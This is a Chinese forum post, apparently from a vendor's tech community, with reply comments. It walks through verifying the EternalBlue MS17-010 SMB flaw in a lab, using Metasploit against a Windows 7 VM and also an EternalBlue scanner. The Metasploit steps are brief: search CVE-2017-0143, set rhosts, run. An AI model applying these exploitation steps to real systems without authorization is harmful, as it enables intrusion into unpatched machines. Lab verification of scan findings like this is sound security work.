嘀嘀柠柠 发表于 2024-6-22 23:44
  
每天坚持打卡学习签到!!
韩_鹏 发表于 2024-6-23 22:03
  
感谢分享                                                    
新手716814 发表于 2024-6-24 08:58
  
一起来学习,一起来学习
新手678795 发表于 2024-6-24 16:32
  
感谢分享,有助于工资和学习!
傲世ღ万物 发表于 2024-6-25 09:37
  
永恒之蓝MS-17010漏洞验证,每日一积累慢慢变专家
新手595921 发表于 2024-6-25 17:44
  
一起来学习,一起来学习
飞翔的苹果 发表于 2024-6-26 08:12
  
一起来学习,一起来学习
平凡的小网工 发表于 2024-6-26 11:16
  
多谢分享,有助于工作。
新手678795 发表于 2024-6-26 13:17
  
感谢分享,有助于工资和学习!
永恒之蓝MS-17010漏洞验证
  

adds 372

{{ttag.title}}


     1、漏洞介绍
      永恒之蓝,也称之为Eternal Blues。2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。        5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,        英国        、        俄罗斯        、整个        欧洲        以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
     2、漏洞利用
     2.1   漏扫报告检测到永恒之蓝漏洞
     在本次给客户做的漏扫报告中,有多个MS17-010漏洞,客户怀疑有可能是误报,想验证下。
     
    2.2  环境搭建使用的工具:
   Vmware workstation、目标机win7 旗舰版64位操作系统、攻击测试机kali 2022。
    首先我们把环境准备好。
    我们的win7系统的IP是192.168.56.137,kali系统是192.168.56.134。
    win7:
   
    kali:
   
    我们在win7的桌子建立一个key的txt文件,做为验证文件。
    2.3  漏洞利用
    在kali系统中输入msfconsole进入metaspolit。
   
    搜索cve编号:search cve-2017-0143
   
    选择0
   
    设置攻击目标:set rhosts 192.168.56.137
   
    执行:run
   
    在返回的控制台界面输入ipconfig,可以看到我们已经接入到了目标机win7系统。
   
    我们找到我们在win7系统桌面上放的验证文件:
   

    3、漏洞验证
    3.1  在2.3步骤时选择3。
    可以看到系统存在该漏洞。
   
    3.2  使用Eternal Blue工具
    在IP Range里输入目标主机,点击“SCAN”进行检测。
   

    4、B站链接

打赏鼓励作者,期待更多好文!

打赏
29人已打赏

发表新帖
热门标签
全部标签>
每日一问
2024年技术争霸赛
技术盲盒
GIF动图学习
干货满满
技术笔记
新版本体验
产品连连看
功能体验
信服圈儿
技术晨报
标准化排查
通用技术
信服课堂视频
2023技术争霸赛专题
技术咨询
华北区交付直播
安装部署配置
自助服务平台操作指引
每周精选
答题自测
流量管理
场景专题
畅聊IT
技术圆桌
用户认证
VPN 对接
排障笔记本
华北区拉练
秒懂零信任
终端接入
地址转换
玩转零信任
专家问答
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
每日一记
运维工具
云计算知识
原创分享
解决方案
sangfor周刊
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
SDP百科
功能咨询
授权
设备维护
资源访问
虚拟机
存储
迁移
加速技术
产品预警公告
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
深信服技术支持平台
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
北京区每日一练
故障笔记

本版达人

新手68983...

本周分享达人

零和一网络

本周提问达人